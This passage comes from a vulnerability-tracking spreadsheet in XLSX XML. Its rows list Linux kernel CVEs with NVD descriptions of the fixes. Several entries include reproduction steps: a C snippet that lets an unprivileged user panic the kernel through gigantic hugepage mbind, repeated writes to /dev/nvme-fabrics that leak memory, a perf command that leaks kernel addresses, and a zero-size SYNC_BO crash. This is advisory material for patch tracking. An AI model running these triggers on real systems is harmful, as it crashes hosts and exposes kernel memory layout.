   shrinks Range A's end from 0x9000 down to 0x5000.
2. When i=2 (Range C):
   ranges[2].start (0x6000) &lt;= ranges[1].end + 1 (0x5001) is FALSE.
   The code falls into the else block, creating a broken new range.
As a result, valid memory fragments [0x5001 - 0x5fff] and [0x8001 - 0x9000]
are completely lost from the kexec exclude lists, potentially allowing
the crash kernel to overwrite active memory, causing data corruption
or crashes.
Fix this by ensuring the start of the current range is compared against the
end of the active merged range (idx), and use max() to safely prevent the
outer boundary from being truncated.</t>
        </is>
      </c>
      <c r="S1621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89962</t>
        </is>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89963</t>
        </is>
      </c>
      <c r="D1622" s="5" t="inlineStr"/>
      <c r="E1622" s="5" t="inlineStr"/>
      <c r="F1622" s="5" t="inlineStr"/>
      <c r="G1622" s="5" t="inlineStr"/>
      <c r="H1622" s="5" t="inlineStr"/>
      <c r="I1622" s="5" t="inlineStr"/>
      <c r="J1622" s="5" t="inlineStr"/>
      <c r="K1622" s="5" t="inlineStr"/>
      <c r="L1622" s="5" t="inlineStr"/>
      <c r="M1622" s="5" t="inlineStr"/>
      <c r="N1622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1622" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1622" s="5" t="inlineStr"/>
      <c r="Q1622" s="5" t="inlineStr"/>
      <c r="R1622" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/kexec_file: Fix null-ptr-def in extra size calculation
A static Sashiko AI review identified a potential NULL pointer
dereference in kexec_extra_fdt_size_ppc64().
On platforms without any reserved memory regions,
get_reserved_memory_ranges() can return 0 while leaving 'rmem'
unallocated as NULL. Passing it directly leads to a kernel panic when
evaluating 'rmem-&gt;nr_ranges'.
Add a NULL check for 'rmem' to prevent this crash.</t>
        </is>
      </c>
      <c r="S1622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89963</t>
        </is>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89964</t>
        </is>
      </c>
      <c r="D1623" s="5" t="inlineStr"/>
      <c r="E1623" s="5" t="inlineStr"/>
      <c r="F1623" s="5" t="inlineStr"/>
      <c r="G1623" s="5" t="inlineStr"/>
      <c r="H1623" s="5" t="inlineStr"/>
      <c r="I1623" s="5" t="inlineStr"/>
      <c r="J1623" s="5" t="inlineStr"/>
      <c r="K1623" s="5" t="inlineStr"/>
      <c r="L1623" s="5" t="inlineStr"/>
      <c r="M1623" s="5" t="inlineStr"/>
      <c r="N1623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1623" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1623" s="5" t="inlineStr"/>
      <c r="Q1623" s="5" t="inlineStr"/>
      <c r="R1623" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
parisc: eisa: Fix infinite loop when parsing invalid IRQ value
When an invalid value is passed via the "eisa_irq_edge=" kernel
command line parameter (e.g. "eisa_irq_edge=16,5"), eisa_irq_setup()
prints an error message and continues without advancing the current
position.  As a result the same invalid value is parsed again and
again, causing an infinite loop while the kernel boots.
Advance to the next comma-separated entry, or stop parsing when there
is no next entry, before continuing so that the remaining entries are
processed normally.</t>
        </is>
      </c>
      <c r="S1623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89964</t>
        </is>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89966</t>
        </is>
      </c>
      <c r="D1624" s="5" t="inlineStr"/>
      <c r="E1624" s="5" t="inlineStr"/>
      <c r="F1624" s="5" t="inlineStr"/>
      <c r="G1624" s="5" t="inlineStr"/>
      <c r="H1624" s="5" t="inlineStr"/>
      <c r="I1624" s="5" t="inlineStr"/>
      <c r="J1624" s="5" t="inlineStr"/>
      <c r="K1624" s="5" t="inlineStr"/>
      <c r="L1624" s="5" t="inlineStr"/>
      <c r="M1624" s="5" t="inlineStr"/>
      <c r="N1624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1624" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1624" s="5" t="inlineStr"/>
      <c r="Q1624" s="5" t="inlineStr"/>
      <c r="R1624" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/hugetlb_cma: fix null nodemask dereference in hugetlb_cma_alloc_frozen_folio
alloc_buddy_hugetlb_folio_with_mpol() can pass a NULL nodemask to
alloc_fresh_hugetlb_folio() as a fallback to allocate from all nodes.  If
order is gigantic, alloc_fresh_hugetlb_folio() propagates the NULL
nodemask down to hugetlb_cma_alloc_frozen_folio() via
alloc_gigantic_frozen_folio().
Additionally, hugetlb_cma_alloc_frozen_folio() previously attempted
allocation on hugetlb_cma[nid] without verifying if nid is included in the
caller's nodemask.  Adding a node_isset(nid, *nodemask) check ensures the
initial preferred node allocation honors the memory policy / nodemask.
However, hugetlb_cma_alloc_frozen_folio() dereferences the nodemask in
node_isset(nid, *nodemask) and for_each_node_mask(node, *nodemask),
leading to a null pointer dereference kernel panic when nodemask is NULL.
Fix this by checking if nodemask is NULL in
hugetlb_cma_alloc_frozen_folio() and defaulting it to
cpuset_current_mems_allowed.  Enclose the allocation attempts within the
cpuset seqcount retry loop so that if the cpuset changes concurrently
during allocation, the attempts are retried using the updated nodemask. 
This ensures that the initial node check and fallback loop safely honor
the task's cpuset without violating cpuset constraints or causing NULL
pointer dereferences or unexpected allocation failures.
From a userspace perspective, this bug allows an unprivileged user to
crash the kernel (trigger a panic) by requesting a gigantic hugepage
allocation with MPOL_PREFERRED_MANY on a system where CMA is only
configured on a subset of NUMA nodes.
This can be reproduced by booting a VM with two NUMA nodes, restricting
CMA to Node 1 (e.g., hugetlb_cma=1:1G default_hugepagesz=1G hugepagesz=1G
hugepages=0), and running a program that allocates a 1GB hugepage area
without reserving, restricts allocation to Node 0 using mbind() with
MPOL_PREFERRED_MANY, and triggers a page fault:
  void *ptr = mmap(NULL, 1UL &lt;&lt; 30, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB |
                   MAP_HUGE_1GB | MAP_NORESERVE, -1, 0);
  unsigned long nodemask = 1; /* Node 0 */
  mbind(ptr, 1UL &lt;&lt; 30, MPOL_PREFERRED_MANY, &amp;nodemask,
        sizeof(nodemask) * 8, 0);
  memset(ptr, 0, 1UL &lt;&lt; 30); /* Trigger fault */
This results in a NULL pointer dereference:
  BUG: kernel NULL pointer dereference, address: 0000000000000000
  #PF: supervisor read access in kernel mode
  #PF: error_code(0x0000) - not-present page
  Oops: Oops: 0000 [#1] SMP NOPTI
  RIP: 0010:hugetlb_cma_alloc_frozen_folio+0x75/0x120
  Call Trace:
   &lt;TASK&gt;
   only_alloc_fresh_hugetlb_folio.isra.0+0x2c/0x160
   alloc_surplus_hugetlb_folio+0x6d/0x100
   alloc_hugetlb_folio+0x3c5/0x660
   hugetlb_no_page+0x3d9/0x650</t>
        </is>
      </c>
      <c r="S1624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89966</t>
        </is>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89975</t>
        </is>
      </c>
      <c r="D1625" s="5" t="inlineStr"/>
      <c r="E1625" s="5" t="inlineStr"/>
      <c r="F1625" s="5" t="inlineStr"/>
      <c r="G1625" s="5" t="inlineStr"/>
      <c r="H1625" s="5" t="inlineStr"/>
      <c r="I1625" s="5" t="inlineStr"/>
      <c r="J1625" s="5" t="inlineStr"/>
      <c r="K1625" s="5" t="inlineStr"/>
      <c r="L1625" s="5" t="inlineStr"/>
      <c r="M1625" s="5" t="inlineStr"/>
      <c r="N1625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1625" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1625" s="5" t="inlineStr"/>
      <c r="Q1625" s="5" t="inlineStr"/>
      <c r="R1625" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-fabrics: fix DHCHAP secret leak on parse failure
nvmf_parse_options() duplicates dhchap_secret and dhchap_ctrl_secret
with match_strdup() before validating the DHHC-1: representation.
If validation fails, the parser returns -EINVAL before the temporary
string in p is assigned to opts-&gt;dhchap_secret or
opts-&gt;dhchap_ctrl_secret. nvmf_create_ctrl() subsequently frees opts,
but nvmf_free_options() cannot release the unassigned temporary string.
Each rejected option therefore leaks one allocation.
This is easy to miss because valid secrets transfer ownership to opts
and are freed normally, while the malformed-secret path still returns
the expected -EINVAL to userspace.
With CONFIG_NVME_HOST_AUTH enabled, the leak is reachable before the
required-option checks and transport lookup. No NVMe-oF target or
working transport connection is required; for example, repeatedly
writing
	dhchap_secret=BAD
or
	dhchap_ctrl_secret=BAD
to /dev/nvme-fabrics deterministically takes the leaking parse path.
Free the temporary string before leaving both validation error paths.
Use kfree_sensitive() because the copied option may contain secret
material even when its representation is rejected, matching the
sensitive cleanup used for stored DHCHAP secrets.</t>
        </is>
      </c>
      <c r="S1625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89975</t>
        </is>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89976</t>
        </is>
      </c>
      <c r="D1626" s="5" t="inlineStr"/>
      <c r="E1626" s="5" t="inlineStr"/>
      <c r="F1626" s="5" t="inlineStr"/>
      <c r="G1626" s="5" t="inlineStr"/>
      <c r="H1626" s="5" t="inlineStr"/>
      <c r="I1626" s="5" t="inlineStr"/>
      <c r="J1626" s="5" t="inlineStr"/>
      <c r="K1626" s="5" t="inlineStr"/>
      <c r="L1626" s="5" t="inlineStr"/>
      <c r="M1626" s="5" t="inlineStr"/>
      <c r="N1626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1626" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1626" s="5" t="inlineStr"/>
      <c r="Q1626" s="5" t="inlineStr"/>
      <c r="R1626" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ethosu: fix job completion fence cleanup
ethosu_ioctl_submit_job() allocates done_fence before validating buffer
handles. Errors after allocation call ethosu_job_err_cleanup(), which frees
the job but leaks the uninitialized fence.
A scheduler dependency error also lets ethosu_job_run() return before
dma_fence_init(). Normal cleanup then passes a zeroed refcount to
dma_fence_put().
Release done_fence in the common cleanup path and use
dma_fence_was_initialized() to distinguish initialized fences from raw
allocations.
[robh: also fix goto]</t>
        </is>
      </c>
      <c r="S1626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89976</t>
        </is>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89977</t>
        </is>
      </c>
      <c r="D1627" s="5" t="inlineStr"/>
      <c r="E1627" s="5" t="inlineStr"/>
      <c r="F1627" s="5" t="inlineStr"/>
      <c r="G1627" s="5" t="inlineStr"/>
      <c r="H1627" s="5" t="inlineStr"/>
      <c r="I1627" s="5" t="inlineStr"/>
      <c r="J1627" s="5" t="inlineStr"/>
      <c r="K1627" s="5" t="inlineStr"/>
      <c r="L1627" s="5" t="inlineStr"/>
      <c r="M1627" s="5" t="inlineStr"/>
      <c r="N1627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1627" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1627" s="5" t="inlineStr"/>
      <c r="Q1627" s="5" t="inlineStr"/>
      <c r="R1627" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ethosu: check MMIO mapping errors in probe
devm_platform_ioremap_resource() returns an error pointer when the register
resource cannot be mapped. ethosu_probe() stores it and continues until
initialization dereferences it through MMIO accessors.
Return the mapping error before initializing the device.</t>
        </is>
      </c>
      <c r="S1627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89977</t>
        </is>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89978</t>
        </is>
      </c>
      <c r="D1628" s="5" t="inlineStr"/>
      <c r="E1628" s="5" t="inlineStr"/>
      <c r="F1628" s="5" t="inlineStr"/>
      <c r="G1628" s="5" t="inlineStr"/>
      <c r="H1628" s="5" t="inlineStr"/>
      <c r="I1628" s="5" t="inlineStr"/>
      <c r="J1628" s="5" t="inlineStr"/>
      <c r="K1628" s="5" t="inlineStr"/>
      <c r="L1628" s="5" t="inlineStr"/>
      <c r="M1628" s="5" t="inlineStr"/>
      <c r="N1628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1628" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1628" s="5" t="inlineStr"/>
      <c r="Q1628" s="5" t="inlineStr"/>
      <c r="R1628" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: return early from a zero-length flush
SYNC_BO does not constrain its size, so a request for zero bytes reaches
drm_clflush_virt_range(), which ends with an unconditional
clflushopt(end - 1). For an empty range that is the byte before the
mapping, and abo-&gt;mem.kva comes from vmap(), so the access lands in the
guard page below the vmalloc area and faults:
  BUG: unable to handle page fault for address: ffffd16fbbc70fff
  #PF: supervisor read access in kernel mode
  Oops: Oops: 0000 [#1] SMP NOPTI
  CPU: 7 UID: 1000 Comm: sync_bo_probe
  RIP: 0010:drm_clflush_virt_range+0x3c/0x70
  Call Trace:
   amdxdna_drm_sync_bo_ioctl+0x124/0x430 [amdxdna]
   drm_ioctl+0x301/0x4c0
   __x64_sys_ioctl+0x115/0x2f0
   do_syscall_64+0xa6/0x3d0
Any process that can open the render node can do this. Reproduced 3 of 3
times on a Strix Point NPU (1022:17f0), by calling SYNC_BO with size 0 on
an AMDXDNA_BO_SHARE object. The import arm takes the same request but
flushes the whole scatterlist, so it survives it.
Nothing needs flushing for an empty range, so answer before choosing a
path.</t>
        </is>
      </c>
      <c r="S1628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89978</t>
        </is>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89981</t>
        </is>
      </c>
      <c r="D1629" s="5" t="inlineStr"/>
      <c r="E1629" s="5" t="inlineStr"/>
      <c r="F1629" s="5" t="inlineStr"/>
      <c r="G1629" s="5" t="inlineStr"/>
      <c r="H1629" s="5" t="inlineStr"/>
      <c r="I1629" s="5" t="inlineStr"/>
      <c r="J1629" s="5" t="inlineStr"/>
      <c r="K1629" s="5" t="inlineStr"/>
      <c r="L1629" s="5" t="inlineStr"/>
      <c r="M1629" s="5" t="inlineStr"/>
      <c r="N1629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1629" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1629" s="5" t="inlineStr"/>
      <c r="Q1629" s="5" t="inlineStr"/>
      <c r="R1629" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: Don't read GMID_EL1 when MTE is disabled
__cpuinfo_store_cpu() gates the GMID_EL1 read on the raw
ID_AA64PFR1_EL1, so it reads the register even when the kernel has
disabled MTE (CONFIG_ARM64_MTE=n or arm64.nomte). KVM sets HCR_EL2.TID5
in that case, and pKVM injects an UNDEF the host cannot handle:
  Internal error: Oops - Undefined instruction: 0000000002000000 [#1]  SMP
  pc : __cpuinfo_store_cpu+0xf4/0x264
  Kernel panic - not syncing: Attempted to kill the idle task!
Only pKVM reaches it, and only after a CPU is offlined and brought back
online: its CPU_ON relay sets the host HCR before the CPU enters EL1,
while plain nVHE sets it at CPUHP_AP_KVM_ONLINE.
Gate the read on the CPU's own ID_AA64PFR1_EL1 with the command-line
override applied, and on CONFIG_ARM64_MTE, which no register reflects.
The boot CPU stores its registers before init_cpu_features() strips an
unsafe override, so clamp against the hardware value here too.</t>
        </is>
      </c>
      <c r="S1629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89981</t>
        </is>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89982</t>
        </is>
      </c>
      <c r="D1630" s="5" t="inlineStr"/>
      <c r="E1630" s="5" t="inlineStr"/>
      <c r="F1630" s="5" t="inlineStr"/>
      <c r="G1630" s="5" t="inlineStr"/>
      <c r="H1630" s="5" t="inlineStr"/>
      <c r="I1630" s="5" t="inlineStr"/>
      <c r="J1630" s="5" t="inlineStr"/>
      <c r="K1630" s="5" t="inlineStr"/>
      <c r="L1630" s="5" t="inlineStr"/>
      <c r="M1630" s="5" t="inlineStr"/>
      <c r="N1630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1630" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1630" s="5" t="inlineStr"/>
      <c r="Q1630" s="5" t="inlineStr"/>
      <c r="R1630" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i2c: mux: Fix channel node leak on adapter add failure
i2c_mux_add_adapter() takes a reference to the Device Tree channel node
before registering the new adapter. If adapter registration fails, the
error path frees the private data without dropping that reference.
Release the channel node before freeing the private data.</t>
        </is>
      </c>
      <c r="S1630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89982</t>
        </is>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89983</t>
        </is>
      </c>
      <c r="D1631" s="5" t="inlineStr"/>
      <c r="E1631" s="5" t="inlineStr"/>
      <c r="F1631" s="5" t="inlineStr"/>
      <c r="G1631" s="5" t="inlineStr"/>
      <c r="H1631" s="5" t="inlineStr"/>
      <c r="I1631" s="5" t="inlineStr"/>
      <c r="J1631" s="5" t="inlineStr"/>
      <c r="K1631" s="5" t="inlineStr"/>
      <c r="L1631" s="5" t="inlineStr"/>
      <c r="M1631" s="5" t="inlineStr"/>
      <c r="N1631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1631" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1631" s="5" t="inlineStr"/>
      <c r="Q1631" s="5" t="inlineStr"/>
      <c r="R1631" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i2c: core: fix debugfs UAF on adapter removal
i2c_del_adapter() frees the adapter's debugfs directory before it
unregisters the adapter device, but the new_device sysfs attribute
stays writable until device_del(). A write racing with removal still
reaches i2c_device_probe(), which passes the freed adap-&gt;debugfs to
debugfs_create_dir() as the new client's parent:
  BUG: KASAN: slab-use-after-free in lookup_noperm_common+0x407/0x430
  Read of size 4 at addr ffff88803ef87810 by task syz.0.61/6090
   lookup_noperm_common+0x407/0x430
   simple_start_creating+0x9c/0x110
   debugfs_start_creating+0xdb/0x1a0
   debugfs_create_dir+0x24/0x350
   i2c_device_probe+0x814/0xbf0
It's technically possible to create a client after i2c_deregister_clients
has run. That client will never be unregistered and make
wait_for_completion hang.
Close the window by removing the new_device attribute at the start of
i2c_del_adapter(). device_remove_file() will drain any clients left.</t>
        </is>
      </c>
      <c r="S1631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89983</t>
        </is>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89984</t>
        </is>
      </c>
      <c r="D1632" s="5" t="inlineStr"/>
      <c r="E1632" s="5" t="inlineStr"/>
      <c r="F1632" s="5" t="inlineStr"/>
      <c r="G1632" s="5" t="inlineStr"/>
      <c r="H1632" s="5" t="inlineStr"/>
      <c r="I1632" s="5" t="inlineStr"/>
      <c r="J1632" s="5" t="inlineStr"/>
      <c r="K1632" s="5" t="inlineStr"/>
      <c r="L1632" s="5" t="inlineStr"/>
      <c r="M1632" s="5" t="inlineStr"/>
      <c r="N1632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1632" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1632" s="5" t="inlineStr"/>
      <c r="Q1632" s="5" t="inlineStr"/>
      <c r="R1632" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/x86/intel: Fix kernel address leakages in LBR stack
Before Arch LBR gained CPL filtering support, a user-only branch stack
could still contain kernel addresses. As a result, kernel branch records
may be exposed to user space even when PERF_SAMPLE_BRANCH_USER is
requested.
For example, on Intel Tiger Lake, the following command can still report
SYSRET/ERET entries with kernel-space from addresses:
$ ./perf record -e cycles:p -o - --branch-filter any,save_type,u -- \
 	./perf bench syscall basic --loop 1000 | \
	./perf script -i - --fields brstack|tr ' ' '\n'| \
	grep -E '0x[89a-f][0-9a-f]{15}'
    Total time: 0.000 [sec]
      0.219000 usecs/op
     4,566,210 ops/sec
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.551 MB - ]
0xffffffff93c001c8/0x7f12a2b1d647/P/-/-/16959/SYSRET/-
0xffffffff93c001c8/0x7f12a2b1d5c2/P/-/-/17535/SYSRET/-
0xffffffff93c01928/0x7f12a2861000/P/-/-/6719/ERET/-
0xffffffff93c01928/0x7f12a297a000/P/-/-/8575/ERET/-
The problem is that intel_pmu_lbr_filter() does not fully validate the
privilege level of sampled entries. It filters some mismatches based on
the branch type and the to address, but it does not reject entries whose
from address violates the requested branch privilege filter.
Fix this by extending software filtering to validate both from and to
addresses against br_sel. Any LBR entry contains kernel address does not
match the requested user filter is dropped. This prevents kernel
addresses from appearing in user-only branch stacks.</t>
        </is>
      </c>
      <c r="S1632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89984</t>
        </is>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89987</t>
        </is>
      </c>
      <c r="D1633" s="5" t="inlineStr"/>
      <c r="E1633" s="5" t="inlineStr"/>
      <c r="F1633" s="5" t="inlineStr"/>
      <c r="G1633" s="5" t="inlineStr"/>
      <c r="H1633" s="5" t="inlineStr"/>
      <c r="I1633" s="5" t="inlineStr"/>
      <c r="J1633" s="5" t="inlineStr"/>
      <c r="K1633" s="5" t="inlineStr"/>
      <c r="L1633" s="5" t="inlineStr"/>
      <c r="M1633" s="5" t="inlineStr"/>
      <c r="N1633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1633" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1633" s="5" t="inlineStr"/>
      <c r="Q1633" s="5" t="inlineStr"/>
      <c r="R1633" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/huge_memory: transfer the pmd dirty bit to the folio on zap
zap_huge_pmd_folio() propagates the pmd young bit to the folio for the
file case, but not the dirty bit.  The pte path does propagate it, in
zap_present_folio_ptes() and so does the pmd split path, in
__split_huge_pmd_locked().
For most file mappings the omission is harmless, because writing to a
shared file mapping goes through page_mkwrite(), which dirties the folio. 
tmpfs is different: it has no page_mkwrite(), and vma_wants_writenotify()
is false for it, so a *read* fault on a MAP_SHARED tmpfs mapping installs
a writable pmd via do_read_fault().  do_read_fault() does not call
fault_dirty_shared_page(), so subsequent stores through that mapping set
only the hardware dirty bit in the pmd and never call folio_mark_dirty(). 
A shmem folio allocated by a fault is marked uptodate but not dirty (see
the clear: block in shmem_get_folio_gfp()), so PG_dirty is never set at
all.
Unmapping such a folio - munmap(), or exit_mmap() when the process dies -
then loses the only record that it was written, because zap_huge_pmd()
drops the pmd without transferring the dirty bit.  Reclaim afterwards sees
a clean shmem folio: the whole swap-out block in shrink_folio_list() is
inside "if (folio_test_dirty(folio))", so pageout() is skipped and the
folio falls into __remove_mapping().  There, folio_is_file_lru() is false
for a swapbacked folio, so no shadow entry is created and
__filemap_remove_folio(folio, NULL) simply empties the i_pages slot.  The
data is freed without ever being written to swap, and the next fault on
that index returns a freshly zeroed folio.
This is silent data loss for any process that keeps state in a MAP_SHARED
tmpfs segment across an unmap - for example a cache handed from one
process generation to the next through /dev/shm.  It requires the folio to
be PMD-mapped, so it only shows up once shmem THP is enabled (which is
what we did in Meta fleet and started noticing crashes); with THP off the
pte path transfers the dirty bit correctly.  It also only becomes visible
when swap is enabled, because with no swap device shmem folios (which are
on the anon LRU) are not scanned by reclaim at all, so the clean folio is
never dropped.
Reproduced on x86_64 with a tmpfs mounted huge=within_size: read-fault a
2MB-backed region, write a known pattern through the resulting mapping,
munmap, force reclaim of the cgroup, then re-map and read back.  Without
this patch the region reads back as zeros and vmstat shows zswpout 0 - the
data was discarded rather than swapped.  With this patch the region reads
back correctly and the pages are swapped out as expected.  With
huge=never, or when the first touch is a write, the test passes either
way.</t>
        </is>
      </c>
      <c r="S1633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89987</t>
        </is>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89989</t>
        </is>
      </c>
      <c r="D1634" s="5" t="inlineStr"/>
      <c r="E1634" s="5" t="inlineStr"/>
      <c r="F1634" s="5" t="inlineStr"/>
      <c r="G1634" s="5" t="inlineStr"/>
      <c r="H1634" s="5" t="inlineStr"/>
      <c r="I1634" s="5" t="inlineStr"/>
      <c r="J1634" s="5" t="inlineStr"/>
      <c r="K1634" s="5" t="inlineStr"/>
      <c r="L1634" s="5" t="inlineStr"/>
      <c r="M1634" s="5" t="inlineStr"/>
      <c r="N1634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1634" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1634" s="5" t="inlineStr"/>
      <c r="Q1634" s="5" t="inlineStr"/>
